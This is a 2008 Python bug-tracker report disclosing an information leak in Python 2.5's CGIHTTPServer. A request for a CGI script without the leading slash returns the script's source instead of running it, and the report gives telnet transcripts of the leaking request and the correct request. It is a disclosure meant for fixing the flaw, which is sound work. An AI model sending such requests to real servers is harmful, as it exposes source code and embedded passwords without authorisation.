Author m.sucajtys
Recipients m.sucajtys
Date 2008-03-07.19:59:43
SpamBayes Score 0.00862819
Marked as misclassified No
Message-id <1204919985.1.0.220899639338.issue2254@psf.upfronthosting.co.za>
In-reply-to
Content
================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================
History
Date User Action Args
2008-03-07 19:59:45m.sucajtyssetspambayes_score: 0.00862819 -> 0.00862819
recipients: + m.sucajtys
2008-03-07 19:59:45m.sucajtyssetspambayes_score: 0.00862819 -> 0.00862819
messageid: <1204919985.1.0.220899639338.issue2254@psf.upfronthosting.co.za>
2008-03-07 19:59:44m.sucajtyslinkissue2254 messages
2008-03-07 19:59:43m.sucajtyscreate